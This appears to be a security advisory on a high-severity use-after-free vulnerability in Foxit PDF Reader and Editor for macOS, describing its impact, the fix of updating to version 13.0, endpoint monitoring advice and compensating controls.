A high-severity vulnerability has been discovered in Foxit PDF Reader and Editor software running on macOS. An attacker could exploit this flaw by tricking a user into opening a specially crafted PDF document, which could allow the attacker to execute arbitrary code and compromise the affected system. This could lead to data theft, malware installation, or unauthorized access to the user's machine and potentially the wider network.

This vulnerability is a use-after-free condition within the PDF parsing engine of the affected Foxit software. An attacker can exploit this by creating a malicious PDF file containing specially crafted objects. When a user on a vulnerable macOS system opens this file, the software attempts to access a memory location that has already been deallocated, leading to a crash that can be leveraged by the attacker to execute arbitrary code with the permissions of the logged-in user.

This vulnerability is rated as High severity with a CVSS score of 7.8. Successful exploitation could lead to a complete compromise of the affected user's workstation. The potential business impact includes the loss of confidentiality through the theft of sensitive documents and credentials, loss of integrity as an attacker could alter or delete files, and the installation of persistent malware such as ransomware or spyware. A compromised endpoint could also serve as a beachhead for an attacker to move laterally across the corporate network, escalating the incident's overall impact.

Immediate Action: Apply vendor security updates immediately. All instances of Foxit PDF Reader and Editor on macOS must be updated to version 13.0 or later to patch this vulnerability. Following the update, security teams should monitor for any post-patch exploitation attempts and review system and application access logs for anomalous activity preceding the patch deployment.

Proactive Monitoring: Implement enhanced monitoring on endpoints running Foxit software. Security teams should look for suspicious child processes being spawned by the Foxit application process (e.g., FoxitPDFReader.app). Monitor network traffic for unusual outbound connections from workstations to unknown IP addresses, especially after a user has opened a PDF document. Endpoint Detection and Response (EDR) tools should be configured to alert on anomalous file creation or script execution originating from the Foxit process.

Compensating Controls: If immediate patching is not feasible, the following controls can help mitigate risk:

• User Education: Advise all users to exercise extreme caution and not open PDF files from untrusted or unsolicited sources, such as unexpected email attachments.
• Application Sandboxing: Ensure that security features like macOS App Sandbox are enabled and properly configured for Foxit applications to limit the potential impact of an exploit.
• Alternative Viewers: Use alternative, fully patched PDF viewers for opening documents from untrusted sources until patching is complete.

Public Exploit Available: false

Given the high severity (CVSS 7.8) and the potential for arbitrary code execution, this vulnerability poses a significant risk to the organization. Although it is not currently on the CISA Known Exploited Vulnerabilities (KEV) catalog, its impact warrants immediate action. The primary recommendation is to apply the vendor-supplied security updates to all affected macOS systems without delay. If patching cannot be immediately deployed, the compensating controls and proactive monitoring outlined above must be implemented as a matter of priority.